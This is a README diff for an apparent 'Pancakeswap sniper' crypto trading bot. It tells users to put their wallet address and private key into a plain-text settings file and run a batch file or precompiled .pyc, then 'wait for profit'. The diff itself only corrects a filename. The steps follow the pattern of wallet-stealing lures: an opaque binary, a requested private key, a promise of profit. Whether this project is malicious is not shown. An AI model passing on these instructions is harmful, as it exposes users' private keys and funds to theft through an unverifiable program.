JohnClue/Pancakeswap_Sniper_Bot_Newversion/README.md

 Install
 1. First of all, you need install Python 3.12 Version
 2. Open "setting.txt" (with notepad for instance) and add your ethereum/bsc address and private key, contract address for snipping & config your bot.
-3. Run "launchbot.bat" OR type "py snipper.pyc"
+3. Run "launchbot.bat" OR type "py sniper.pyc"
 4. Waiting for profit !